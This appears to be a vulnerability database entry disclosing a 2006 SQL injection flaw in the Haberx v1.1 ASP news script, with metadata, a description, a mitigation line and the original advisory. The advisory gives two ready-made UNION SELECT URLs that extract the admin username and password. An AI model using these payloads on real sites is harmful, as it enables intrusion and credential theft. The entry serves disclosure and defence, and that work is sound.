Haberx v1.1 (tr) SQL Injection Vulnerability

vendor:

Haberx

by:

Fix TR

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Haberx

Affected Version From: 1.02

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Haberx v1.1 (tr) SQL Injection Vulnerability

Haberx v1.1 (tr) is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the admin credentials by sending a specially crafted HTTP request to the vulnerable application. The vulnerable parameter is 'id' in 'kategorihaberx.asp' page. An attacker can send a malicious payload to the vulnerable parameter to gain access to the admin credentials.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. The application should also be tested for SQL Injection vulnerabilities.

Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                +
+ Site    : www.hack.gen.tr                       +
+ Contact : fixtr[at]bsdmail.com                  +
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In  : kategorix.asp
+ Risk    : High


+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1

+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1

# milw0rm.com [2006-09-15]